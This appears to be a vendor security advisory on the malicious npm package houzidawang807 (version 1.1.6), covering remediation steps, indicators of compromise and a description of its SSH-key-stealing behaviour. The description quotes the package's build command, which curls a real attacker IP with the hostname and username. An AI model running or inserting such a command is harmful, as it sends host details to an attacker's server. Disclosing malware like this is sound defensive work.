Which versions of houzidawang807 are malicious?

The following npm versions of houzidawang807 are flagged malicious: 1.1.6. Treat any of these as compromised.

How do I remediate houzidawang807 if I installed it?

Remove houzidawang807 from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is houzidawang807 part of a known attack campaign?

Yes — houzidawang807 is associated with the IN-MAL-2026-006305, IN-MAL-2026-006306 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect houzidawang807 in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking houzidawang807 and packages like it before any post-install script runs.

Malicious package

houzidawang807npm

Malicious code in houzidawang807 (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5731

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall houzidawang807

What this malware does

Package advertises itself as 'a simple date formatting utility' but ships an SSH-key-stealing C2 client. postinstall.js enumerates ~/.ssh for *.pub files, collects the installer's username and platform, and POSTs a JSON payload over HTTPS to the hardcoded bare IP 124.221.154.135. Source comments explicitly label this destination as the attacker's C2 server. package.json additionally declares a build script that curls http://124.221.154.135/pre?h=$(hostname)&u=$(whoami), leaking host identifiers in plaintext to the same C2. The legitimate-looking surface is a 3-line formatDate wrapper in index.js; the rest of the package is attack tooling. Although the malicious file is named postinstall.js, it is not currently wired into a lifecycle hook (scripts only declares build), so default npm install does not auto-execute it — however, the file is loaded by any consumer that requires the package or invokes the build script, and the file's name strongly suggests the author intends to enable it as a lifecycle hook in a follow-up version.

Malicious versions

1 flagged

1.1.6

Indicators of compromise (SHA-256)

7568d90e7a8d940b5618fa36bccfc2b7fa02ceaa814f0a416d2cc989c685e489

d87a9bdb30c6c4de17c6d4f01a94a84c0e597eee96f324082f880b9915c44498

Frequently asked questions

No. houzidawang807 on npm has been identified as a malicious package (version 1.1.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006305IN-MAL-2026-006306

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection